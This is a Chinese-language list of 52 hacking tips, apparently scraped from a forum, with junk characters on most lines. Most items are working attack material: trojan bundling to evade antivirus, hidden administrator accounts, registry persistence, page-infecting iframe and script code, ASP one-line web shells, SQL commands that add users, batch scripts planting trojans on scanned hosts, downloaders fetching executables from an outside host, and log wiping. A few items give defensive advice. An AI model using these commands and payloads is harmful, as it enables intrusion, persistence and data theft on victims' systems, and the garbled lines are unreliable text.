Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 {6 e0 g- m9 v& m. `cacls C:\windows\system32 /G hqw20:R
/ x. G9 D. C. c+ V* z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 S; W( z- ?4 e! x: C; X& H7 G
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
e r9 b' @) S$ p9 `" ]8 S3 Q) x- Z+ O6 Q4 i+ |
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: k0 V3 M1 M! K q" D1 o) t0 _: e/ y1 L+ q: U6 S- B
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 w3 b3 q# ?: n8 [2 R5 i( x
, v$ G0 Z Y5 g& v
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
! p8 ]) x. a, S y
7 l( O* h6 O* x8 C5 @" W( }0 n5、利用INF文件来修改注册表
~* W3 J* O/ p P[Version]
+ F+ v+ l- s& s/ ]/ ]5 xSignature="$CHICAGO$"
: k8 n) k2 F, [( h# n% B& V( b[Defaultinstall]' `6 w+ X; d4 g) O$ y) c. [
addREG=Ating5 `( b+ [+ C" e& @6 V$ Y5 ^4 {
[Ating]
5 [. }' U+ \* x1 z! Q* G) h- kHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
4 J# E* w5 Z! Y0 B, A以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:4 E7 j) {6 h4 c( ~" }9 c/ K$ j
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
. ^9 _* i5 u3 @! z其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
5 f2 }: v# n1 V m+ I* ~% X% THKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% l, t' E7 l' ~$ {4 nHKEY_CURRENT_CONFIG 简写为 HKCC
; k9 }& [) J$ `8 O9 W6 y# H0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值9 g7 e4 B6 s- I, D# j" E6 N
"1"这里代表是写入或删除注册表键值中的具体数据9 z/ P' p/ g/ Z4 S# I, L M3 w
" ]8 O' C; R5 |6 U
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
" F. B4 g# h% N* } F T多了一步就是在防火墙里添加个端口,然后导出其键值
. n ?. u6 V) ^' m5 Z Z* V1 ]) o$ A[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]; q* z7 Y2 p1 S* S
$ H0 s" Q$ E5 c' I( X2 p7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
/ P& ]: }4 S/ d2 C/ G3 j! f( ~% m在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。& d. L" Z' J1 N1 I; k
2 a% q; u, v1 P5 O5 ^2 Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) R( H( f1 v6 z- J/ Z) b( U6 n7 }: r# r5 F$ d
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
) u; E; {! w" @/ c+ V M! B0 K! ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( M z: c. O8 {
' N2 L* y' ], K5 H10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”. k8 r. c0 b/ m
) v3 {2 L5 e& _7 D9 u
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 ^& L3 _3 B, B, J9 s t用法:xsniff –pass –hide –log pass.txt) D8 r- t* E7 E. b: D
( s9 R; @0 V* y$ Q* g
12、google搜索的艺术- F9 v% S) u/ p9 E- A
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 e* d: j& S! q7 k( g' p或“字符串的语法错误”可以找到很多sql注入漏洞。" _$ h& \$ P2 y) _8 O8 O+ W
; e, [, N$ ^4 B6 |. f2 V13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
( l4 k/ O9 N6 g% ? w8 {2 O: Q0 m5 D: K
14、cmd中输入 nc –vv –l –p 1987
% p* r/ s9 W1 x7 K做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. `( l* ^/ c. n, S5 K& @& q
5 j8 V6 M0 @$ r6 j9 z& D. I
15、制作T++木马,先写个ating.hta文件,内容为. j0 h! G& U, l; ~
<script language="VBScript">; c4 `, x2 @* x6 \
set wshshell=createobject ("wscript.shell" )
( @/ ^! b7 Q0 Oa=wshshell.run("你马的名称",1); I$ ?0 S2 u7 i {1 n
window.close
1 R: g3 ^5 B; _</script>7 S* `, O; I2 i' r- X- E
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。& t" Z8 Q+ a) a r
+ r T0 y ?8 C) T0 r8 _, T
16、搜索栏里输入
7 R' e3 s! k2 X4 `- t8 E& P# K关键字%'and 1=1 and '%'='% a3 ~) c4 W# M; _. O3 x& U
关键字%'and 1=2 and '%'='
* a$ S& }. q. M2 g+ J比较不同处 可以作为注入的特征字符
, \) ]& F- B5 B) E9 N3 W
0 g7 j( U/ r, f17、挂马代码<html>
0 b" m' ^) f2 v) N8 ?1 ]. o& z, {7 r<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>( X5 @; J L [0 z
</html>
. D9 G' c& t0 b" U9 r. h
B0 I! t6 a7 D% p18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,% u7 r1 f y6 s( s; | W' `; o
net localgroup administrators还是可以看出Guest是管理员来。
) S+ l: k7 F2 z& C' u7 J( J) ?. T1 v _2 w& k; m8 x1 P( S/ o$ I
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等5 s$ X3 K [- n: d
用法: 安装: instsrv.exe 服务名称 路径# Y; y) `( X. j/ C
卸载: instsrv.exe 服务名称 REMOVE
) N; F/ y* G/ Y8 Q* ?& O+ h% n8 F$ Q' A4 |2 {" R& I) x
( W7 j1 [; p, @( I$ p" I7 r21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
[- N4 j0 \) L7 o, a不能注入时要第一时间想到%5c暴库。
0 X% F% D3 J# v: N! ]7 B
$ X- b; l9 u* t# W! L22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~% l- Y2 W" i2 h1 }9 y
h$ Z! P/ o' o& c* n23、缺少xp_cmdshell时4 ?8 _) F$ j8 ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( F# d* }; _" G) b/ F! I; U
假如恢复不成功,可以尝试直接加用户(针对开3389的)
- P3 l! k8 N6 V1 s3 Ydeclare @o int" C: f x' Q& D
exec sp_oacreate 'wscript.shell',@o out, n$ o R8 G" |0 _$ B( A
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
, u2 s2 H ]2 h+ G* t; J0 ]
" U6 d3 c% \' w% L3 s24.批量种植木马.bat' `5 {6 J! Y$ w) [2 P- j& n- D& B
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中1 K3 \4 J' z5 Q0 P( P" L, j! ^' D
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间/ p1 ^) o# d& T- G8 Y
扫描地址.txt里每个主机名一行 用\\开头. [. {1 g7 p% q+ y* j
! q. D2 z/ q2 D2 S6 g2 k3 a25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! @" G o0 A: o' p7 t
& G1 }9 ~ V, `) u- E% e& _26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; h) B7 R3 N5 `7 Q% Q将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: \/ {0 x: G* U6 g.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
( j6 ?; _* @( K" z4 \
4 M3 g; ~8 q& _% D) M( Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP. w4 u7 N9 d2 W. e# N; q
然后用#clear logg和#clear line vty *删除日志
0 g- l, \ H1 A' z( H, G* P
3 J7 Y% j) `2 @3 g, d9 _28、电脑坏了省去重新安装系统的方法
; ~* ?* p3 ^0 M. J% J+ M纯dos下执行,
8 U3 y, y @; kxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* q2 R, }2 T& k8 i4 C G! K
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config: w; N9 _7 Z3 n3 [/ r2 o9 W: K3 K
: B; D7 D N, {# K0 I2 A29、解决TCP/IP筛选 在注册表里有三处,分别是:
, K g$ B* }& h! f, hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 G: v6 |2 t- H" O xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 X7 u2 j+ `! z2 T/ C$ QHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ G6 I* l: ?; u1 [* W! g0 K2 ]3 x5 T
分别用
5 D2 X5 [2 `! e2 pregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' e: O+ \- u% U I4 n1 B1 m
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% S( L/ T% ]* Z- p* ^8 V! ?" t' y4 Uregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 d. F9 a& K C3 _) f
命令来导出注册表项
$ z4 ^, V2 r2 ^' L& y0 G7 b然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 h7 s1 y$ o! Z. ^改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* e! z$ b& f$ H) w. R& ~. F$ E
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 c: [ G0 M( f! g) {9 _! m9 Y% }7 S/ ^: G9 t F
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 h7 M3 T: t; v3 O
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3! Z# n9 f3 d4 |3 j# J. n: k3 ]
/ }& e$ y( ^7 q" f9 e
31、全手工打造开3389工具! K, \- [( m/ C6 q2 ^2 X
打开记事本,编辑内容如下:( p' h* ?- F+ ?4 a
echo [Components] > c:\sql" X) p8 g: |# |
echo TSEnable = on >> c:\sql
/ N4 X; K6 ]; csysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) h7 c' W& q# s! Y+ e
编辑好后存为BAT文件,上传至肉鸡,执行
- D$ z! b: Q* i) D
9 y. K( {# d3 I/ G- `32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
- f. h9 z4 X6 G7 k5 a% Y
* f `+ s( n$ K& Z1 |# L& [+ K% F33、让服务器重启 c. ` G7 N# q2 Z) I
写个bat死循环:# i* D f) z: M ~+ F
@echo off* _) G/ g4 Y& r; P, M0 W
:loop1
' l, e# w& Y6 Z- U w; pcls
# H/ x! _% |$ a) ~; Ustart cmd.exe
/ w* `; E$ ~5 zgoto loop1( p. m+ D4 X( l1 \" D/ n+ p
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
: N4 ], r+ t9 a$ I- A
) [7 T$ \+ N9 Y6 X% m34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,2 w7 f+ R6 B- ]2 Z ^7 ~/ H% z
@echo off
; b+ D' }+ c% X! e' k7 Ndate /t >c:/3389.txt) |$ B0 {. {8 O' \$ Y
time /t >>c:/3389.txt
5 h& h+ g! ~/ w5 _3 m, y/ ~attrib +s +h c:/3389.bat
; R' D3 A, d2 r0 w/ g6 q& pattrib +s +h c:/3389.txt
. ^3 v3 P" q! A) @' L) V ^netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt- |6 U/ w/ `( m! A/ h! x! F
并保存为3389.bat+ S( B7 q7 v% y" Y8 l! T
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号) v& o4 i6 g# d$ T+ n3 X
5 b, b4 L) K0 ^* U35、有时候提不了权限的话,试试这个命令,在命令行里输入:
/ Y/ U4 ]5 U/ L" A+ U w. e' Astart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- e& S' f5 ?. n( ?
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。+ }4 {( i+ \5 ?; v
, J. h% p ?! G4 R& i36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
- P X- b, n. |! z' Wecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
/ U+ I$ N( M2 W+ Kecho 你的FTP账号 >>c:\1.bat //输入账号
' _5 A4 y& `1 @6 d- r" M4 Fecho 你的FTP密码 >>c:\1.bat //输入密码0 ?! F! I. `0 m; b7 O, o
echo bin >>c:\1.bat //登入+ X, Z! B. R" a# |$ O/ y: C
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( V V9 A# r& N
echo bye >>c:\1.bat //退出
8 C# X; t$ A" t+ b! E5 h x4 U' \然后执行ftp -s:c:\1.bat即可; {. ?' g9 f1 L) N- D) b
`, |1 o1 f" y1 r2 F
37、修改注册表开3389两法
: X% V/ q# [) ]4 M6 o' {; T(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表& K: F) e( } ?5 Y
echo Windows Registry Editor Version 5.00 >>3389.reg1 @- U6 x1 B& v- q" a |
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
* w5 G+ r/ e* n2 p' Secho "Enabled"="0" >>3389.reg
- E) U7 w% b2 f: @: Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, o% a9 J0 S$ U: ^. x* F! [
NT\CurrentVersion\Winlogon] >>3389.reg
4 Q1 i( u6 R) q& n' ?echo "ShutdownWithoutLogon"="0" >>3389.reg) p, K2 k o0 v/ u" a! M" k* v3 r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]! T- R# X9 w/ r! `. k$ D
>>3389.reg
- X7 F: l3 `! r+ X# Kecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 C* k( q. j; g# w1 R$ Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
( G% U, L/ k {>>3389.reg
9 i6 n1 k5 H$ j' x& o# R+ becho "TSEnabled"=dword:00000001 >>3389.reg
- E3 Z: ?) o6 t' becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
/ S9 V' k3 N- V+ i, N: Pecho "Start"=dword:00000002 >>3389.reg
0 V. v) e% `' A. s, m2 z5 T, secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
6 m8 H( p+ D( B9 \& J7 R>>3389.reg2 n* X4 Q& o0 V# j8 ]
echo "Start"=dword:00000002 >>3389.reg0 Z0 M C* G* _* D/ c' Y
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 o+ M5 w+ A Y( k' D
echo "Hotkey"="1" >>3389.reg
, O O, J1 g, r! xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& `: |0 @8 s1 ` v
Server\Wds\rdpwd\Tds\tcp] >>3389.reg! r+ V! t# x( O2 j0 m6 U! w
echo "PortNumber"=dword:00000D3D >>3389.reg. C" _7 c) n4 P7 G) }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. n3 I2 b+ `, ? J4 K
Server\WinStations\RDP-Tcp] >>3389.reg
* C9 E( [% l) i e5 B: oecho "PortNumber"=dword:00000D3D >>3389.reg- P" @7 P# C9 g i- c
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
* l% g( U& `, V& ?4 Q9 D(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
) z! t1 H) u, b因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" ~& W$ N9 r2 e8 k2 x$ m5 I
(2)winxp和win2003终端开启
6 N) w; F2 A! j0 I( D用以下ECHO代码写一个REG文件:
/ `* g- P2 d8 a; [( Hecho Windows Registry Editor Version 5.00>>3389.reg6 z0 ^6 T' U. k: V9 v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& Q" ]+ j. L- r/ }Server]>>3389.reg
' I, J5 m/ @2 q3 H- k% _6 Kecho "fDenyTSConnections"=dword:00000000>>3389.reg
/ R" C3 Y5 D0 D# L$ V, mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- C1 h" K7 S3 \Server\Wds\rdpwd\Tds\tcp]>>3389.reg
% u; \( T) x" B+ U N- `echo "PortNumber"=dword:00000d3d>>3389.reg
* ?( a0 ~! L5 _: P+ Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal b$ E# C% I( P
Server\WinStations\RDP-Tcp]>>3389.reg
# }1 @1 [% V3 n/ I/ a7 ^* H* E& @# H" Oecho "PortNumber"=dword:00000d3d>>3389.reg
5 y# ~1 v: g: e: d+ E5 {然后regedit /s 3389.reg del 3389.reg
( b. D, k# D3 K0 ^7 Y: i: x( fXP下不论开终端还是改终端端口都不需重启
4 V& I9 O5 r7 [" Z) a2 y! C: ]; i- h: e/ [) X# C8 B
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( Y$ N& A7 i1 S用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- T7 A H8 |$ | f) L) X" Y# K+ H2 b) ?, x5 R' R
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
5 p; u f$ J w# b(1)数据库文件名应复杂并要有特殊字符
" E+ c& d, r) _5 |+ X6 ^1 i2 \3 P0 ]9 `(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% A. F8 n* P. \1 `# Q将conn.asp文档中的
9 k( I6 ^* ~1 rDBPath = Server.MapPath("数据库.mdb")
% v$ }6 L0 R& \$ c! f7 yconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 J- s7 O! g/ M& O9 k, j! g6 P O
3 D* g6 T, f3 j( b
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
0 W2 S* k) ]+ P* m- B(3)不放在WEB目录里. j. y( F: n) U, M3 m: a3 u
4 s! L d4 {: K7 n3 z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉% b% v6 H7 G; @2 z# S" ~/ r# c( C
可以写两个bat文件
! s4 v" M# v! h8 @ ]! c@echo off
4 |& N( e. B6 ~% q Q3 T@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
8 e" ]- y: o0 T' D+ m) E3 w& i0 b2 O@del c:\winnt\system32\query.exe& v6 C+ A. X4 g" L+ B3 J1 J
@del %SYSTEMROOT%\system32\dllcache\query.exe
& B2 j1 M$ D5 D& N7 d3 I@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的5 n6 R* t* p4 {: \! y( d
) ^" R% h8 e8 r5 s4 e% K( l# \@echo off( \( h' W' _1 G9 N+ g
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- k8 H3 H5 z/ M; ~
@del c:\winnt\system32\tsadmin.exe& ~2 G2 I B- s3 C+ i
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
K0 O3 L% {( t4 ~; y
5 M" L7 t- r, b8 D3 X- I: F( Y41、映射对方盘符$ p" `" K3 C1 s; b; H
telnet到他的机器上,
1 `3 h! O" g( ]7 A; v2 fnet share 查看有没有默认共享 如果没有,那么就接着运行, E2 i$ U8 R4 p$ v/ R$ X/ s
net share c$=c:3 R3 n8 U& p( ]5 R# h
net share现在有c$& i, t1 |8 n/ M
在自己的机器上运行
: p$ w' R0 X+ O& I m. \net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K3 w$ e0 Z4 w) S1 }7 L0 M% d
9 \( v2 q' m2 F( w
42、一些很有用的老知识" y' n7 B' M& q3 |0 {5 h
type c:\boot.ini ( 查看系统版本 )" i' A9 \& U8 c. @9 k
net start (查看已经启动的服务)+ @0 L3 r3 r$ e$ s, s5 x6 ^
query user ( 查看当前终端连接 )( a) i; Z+ R% L- E( l) o/ G% H
net user ( 查看当前用户 )# W0 F* m4 Q- ]0 i( L9 P9 m
net user 用户 密码/add ( 建立账号 )3 z/ U& c. h8 E& ?& F+ Z
net localgroup administrators 用户 /add (提升某用户为管理员)
! J8 Z$ k3 L6 iipconfig -all ( 查看IP什么的 )
# U- T, w7 ?6 H3 ?0 znetstat -an ( 查看当前网络状态 )
! }8 y u( F3 Kfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)' B) q1 }2 _5 b! n: z4 l, {& v
克隆时Administrator对应1F4) x7 n' a: Q [8 K. z) J6 d A( O
guest对应1F5' ^- ?5 ^' W( y3 E
tsinternetuser对应3E8
' i) H( ]* A9 T( r# E w" W& c+ H0 ~
- K, K' _4 S* P43、如果对方没开3389,但是装了Remote Administrator Service
; I* V1 ~/ }+ [" E用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ Y, ?! L& B z) b- G1 \
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ k: K7 F3 q" A4 ^
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
7 M, i9 V g0 C2 L4 F* d
1 q# j. ^7 `& ^6 I5 i% S8 U9 p+ M" s44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
3 G* _) v. C9 j A: r本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)( F$ n* G# z. i, W' p a
8 W8 {+ Z! q' {, \1 d45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: ]+ ?- G, v7 a1 y6 u! C2 A# d9 y1 x0 {echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 Y+ Q1 e% M1 X8 ]
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
4 O3 x% E* P2 z# l NCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
! n7 Y( O6 S8 }9 q( \1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs0 E# B- Z4 M/ k2 R" P: p( P+ r
(这是完整的一句话,其中没有换行符)
/ @! i7 Z6 p# ~" s$ C, X( s然后下载:
* g% t* p' _! {# [cscript down.vbs http://www.hack520.org/hack.exe hack.exe) {. Y! G# z. e3 x: Z; ~
2 ]9 c7 h( ?/ D* e; X46、一句话木马成功依赖于两个条件:+ p1 r/ {; l: k6 W" [+ o- O
1、服务端没有禁止adodb.Stream或FSO组件8 \, M& V# Z0 R# N7 t3 N- r: v
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
4 i$ b- z/ o; a5 J9 k9 L8 i$ N; x7 N+ v
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
& `' M$ E. x' N. s+ ^# y;alter database utsz set RECOVERY FULL--
5 B& e& v) |+ u' w5 a6 K;create table cmd (a image)--
8 o! `9 f8 X$ y9 ?4 L# f;backup log utsz to disk = 'D:\cmd' with init--: ^; Z) I& \ b. T" M1 M' B: L( t2 |9 \
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--, O" m- B, _+ T7 V; F/ o
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; |) S2 ~2 Y$ q* n; \1 d注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。 y, a" g0 x1 }$ ]/ U
* e+ r( G& m& [& c* [48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" \/ @$ j5 B9 ?' Q# }
$ O8 K! I9 a5 x2 v用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
0 |2 E! N8 s& w% ]* `) d所有会话用 'all'。& M5 X% s) o5 `/ r5 u
-s sessionid 列出会话的信息。4 Y# ~2 u0 G/ c) P) n/ f# `
-k sessionid 终止会话。
9 b; {" r& ?5 x/ i: Q-m sessionid 发送消息到会话。& h( Q1 I3 O+ X4 x3 `2 g) p
) v1 |+ L8 F8 r& w% f3 K
config 配置 telnet 服务器参数。
2 v3 ~- i9 t- C6 y" P3 F. V5 {9 P6 e+ U! h
common_options 为:
2 A! g# @' X' i* \7 h* Q6 {-u user 指定要使用其凭据的用户
, Q% F& k- P( Z9 [-p password 用户密码
7 J+ b% h, u% d- ~* B" T& ~% T ~
7 c# ]9 `) ~3 ?. F' gconfig_options 为:& Y! ~0 B* ~- I
dom = domain 设定用户的默认域- q! b& W) `3 U* W5 ` V2 J
ctrlakeymap = yes|no 设定 ALT 键的映射
& q' D1 @2 x, z3 g, otimeout = hh:mm:ss 设定空闲会话超时值
+ t8 M+ g. n/ |9 v8 N4 }( `% o$ Xtimeoutactive = yes|no 启用空闲会话。3 O. X/ { X+ u7 W2 g
maxfail = attempts 设定断开前失败的登录企图数。 i' z. T; ] q$ i) O( ^. y
maxconn = connections 设定最大连接数。0 V, c4 U6 f/ z" x2 F
port = number 设定 telnet 端口。
6 r! |" @$ q( U Isec = [+/-]NTLM [+/-]passwd
2 w- }* _$ T. p. z/ d设定身份验证机构( x$ O) O* b) Q0 r
fname = file 指定审计文件名。
( z. G& @; W/ Q3 Afsize = size 指定审计文件的最大尺寸(MB)。
( o, K" `5 U# j' k1 G/ P: _# Mmode = console|stream 指定操作模式。
( N* D3 n+ ]0 w' v( Cauditlocation = eventlog|file|both! I0 }) N. a" q+ D
指定记录地点& _: l' k& T9 U ~2 g9 C) p
audit = [+/-]user [+/-]fail [+/-]admin
; u& O) k6 S& o
& ~/ n5 \! l! l& M: P* s; ?49、例如:在IE上访问:1 C: Y' J5 e$ I" y
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
% |4 |6 q. U! U, ]0 y' t Ghack.txt里面的代码是:
+ V0 w* l" Q: J5 x' Q% S<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">$ {& A. g8 g+ `6 t* D
把这个hack.txt发到你空间就可以了!
. f( [3 C0 G3 n/ q2 @3 G4 t这个可以利用来做网马哦!
& {. T4 ^% p* s+ r8 k/ V; V4 j$ u& a9 ~: c
50、autorun的病毒可以通过手动限制!7 G }. r3 Y4 f3 D Q& f* w
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( {# r3 g+ A m# N. D4 v0 P! V1 l2,打开盘符用右键打开!切忌双击盘符~
, w( s" D5 @& s) W4 W3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' N* {0 N5 Q" ^$ p( Y f* k
0 S m+ i$ f0 P7 J. {2 T51、log备份时的一句话木马: P4 D5 x( ]$ t' E( B
a).<%%25Execute(request("go"))%%25>
" w* f. L& r3 V k5 E, j( Gb).<%Execute(request("go"))%>
# e$ w3 ^( ]' Y4 \c).%><%execute request("go")%><%5 M; H/ W9 P2 N) ^. ]# n
d).<script language=VBScript runat=server>execute request("sb")</Script>3 ^: P. H6 z) e) Y+ H* }/ T S
e).<%25Execute(request("l"))%25>8 y7 O ]. ^7 z4 E5 T8 y0 E2 o' X1 m
f).<%if request("cmd")<>"" then execute request("pass")%>; p. L- @9 G, K; h8 i
]/ ]9 z* `$ Q3 a6 i: Z# X52、at "12:17" /interactive cmd
2 s, W1 r* k& D4 k执行后可以用AT命令查看新加的任务
$ D' q# f9 p+ a( e7 f6 W用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。& ^2 _" J! J m9 U
